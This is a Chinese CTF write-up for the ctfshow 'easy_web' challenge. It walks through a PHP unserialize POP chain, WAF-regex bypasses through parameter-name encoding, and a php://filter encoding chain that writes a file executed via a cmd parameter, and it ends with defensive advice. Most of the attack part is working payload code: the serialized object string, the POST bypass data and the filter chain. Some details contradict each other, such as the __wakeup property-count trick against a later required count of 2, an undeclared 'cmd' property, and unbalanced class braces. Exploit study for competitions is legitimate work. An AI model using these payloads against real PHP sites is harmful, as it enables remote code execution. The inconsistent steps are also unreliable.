手把手复现ctfshow easy_web：POP链构造、WAF绕过与filter写shell的完整实战

CTFPHP安全反序列化漏洞WAF绕过

于 2026-05-31 12:02:42 修改

·本内容遵循CC 4.0 BY-SA版权协议

CTF实战：PHP反序列化漏洞与Filter协议的高级利用技巧

在网络安全竞赛和渗透测试中，PHP反序列化漏洞一直是高频考点。本文将从一个典型CTF题目入手，深入剖析POP链构造、WAF绕过技巧以及filter协议的高级利用方法，帮助开发者建立系统化的漏洞利用思维。

1. 环境准备与漏洞分析

首先我们需要搭建本地测试环境，建议使用Docker快速部署PHP 7.x环境。关键是要确保具备以下条件：

PHP版本5.6-7.4（反序列化特性最丰富的版本段）
开启error_reporting(E_ALL)方便调试
准备Burp Suite或Postman用于请求构造

分析题目源码，我们可以识别出三个关键类：

PHP

class ctf {

public $h1;

public $h2;

public function __destruct() {

$this->h1->nonono($this->h2);

}

class show {

public function __call($name, $args) {

if(preg_match('/ctf/i',$args[0][0][2])) {

echo "gogogo";

}

class Chu0_write {

public $chu0;

public $chu1;

public function __toString() {

if ($this->chu0===$this->chu1) {

$content='ctfshowshowshowwww'.$_GET['chu0'];

file_put_contents($_GET['name'].".txt",$content);

}

return "Go on";

}

漏洞触发点分析：

反序列化入口：unserialize($_GET['show_show.show'])
执行链路：__destruct → __call → __toString
最终利用：file_put_contents配合filter协议写入恶意代码

2. POP链构造与序列化技巧

POP(Property-Oriented Programming)链是通过控制对象属性实现的调用链。本题的构造逻辑如下：

TEXT

ctf::__destruct()

→ show::__call()

→ Chu0_write::__toString()

具体实现代码：

PHP

$a = new ctf();

$a->h1 = new show();

$a->h2 = [[2 => new Chu0_write()]];

echo urlencode(serialize($a));

关键注意事项：

__wakeup绕过：通过增加对象属性数量（如O:3:"ctf":3而非实际的2）
数组结构设计：__call的$args参数需要三层嵌套数组
属性初始化：确保chu0和chu1相等以触发__toString

序列化后的Payload示例：

TEXT

O:3:"ctf":3:{s:2:"h1";O:4:"show":0:{}s:2:"h2";a:1:{i:0;a:1:{i:2;O:10:"Chu0_write":3:{s:4:"chu0";N;s:4:"chu1";N;s:3:"cmd";N;}}}}

3. 多层WAF绕过实战

题目设置了多重防御机制，需要逐层突破：

3.1 WAF1：字母字符检测

规则：preg_match('/[a-z]/i', $value)

绕过方法：

利用$_REQUEST参数优先级：POST > GET
通过POST传递参数值，GET保持URL编码形式

TEXT

POST数据：

show[show.show=1&name=1&chu0=1&cmd=1

3.2 WAF2：关键词过滤

规则：preg_match('/show/i', $_SERVER['QUERY_STRING'])

绕过技巧：

URL全编码参数名：show_show.show → %73%68%6f%77%5b%73%68%6f%77%2e%73%68%6f%77
使用参数解析特性：show_show.show → show[show.show

3.3 正则校验

规则：preg_match('/^[Oa]:[\d]/i', $_GET['show_show.show'])

解决方案：

严格遵循序列化格式：O:3:"ctf":2:{...}
避免使用数组形式(a:开头)的序列化数据

4. Filter协议的高级文件写入

当常规文件写入受限时，php://filter协议提供了编码转换的可能性。本题需要实现：

清空原始内容(ctfshowshowshowwww)
写入可执行函数名(如system)
确保最终文件内容符合PHP语法

分步实现方案：

PHP

// 1. 准备待写入的函数名

$func = 'system';

$base64 = base64_encode($func); // 'c3lzdGVt'

// 2. 转换为UTF-16编码

$utf16 = iconv('UTF-8', 'UTF-16LE', $base64);

// 3. 进行quoted-printable编码

$payload = quoted_printable_encode($utf16);

对应的filter链构造：

TEXT

php://filter/convert.quoted-printable-decode/convert.iconv.utf-16.utf-8/convert.base64-decode/resource=ctfw

编码转换原理：

处理阶段	操作	内容变化
原始输入	-	ctfshowshowshowwww
quoted-printable-decode	解码	去除=符号和换行
iconv.utf-16.utf-8	编码转换	产生乱码字符
base64-decode	解码	过滤非base64字符

最终通过eval执行写入的函数：

TEXT

?cmd=env

5. 防御建议与安全实践

针对此类漏洞，开发者应采取多层次防护：

输入验证：
- 使用json_decode()替代unserialize()
- 设置allowed_classes白名单
WAF强化：

PHP

function advanced_waf($input) {

if (preg_match('/^[Oa]:\d+:/', $input)) {

return false;

}

return true;

}
运行时防护：
- 禁用危险协议：ini_set('allow_url_fopen', '0')
- 限制文件操作目录：open_basedir
编码规范：
- 避免魔法方法中的敏感操作
- 对__toString等做严格类型检查

在实际开发中，建议使用静态分析工具如PHPStan定期扫描代码，并结合单元测试验证反序列化安全性。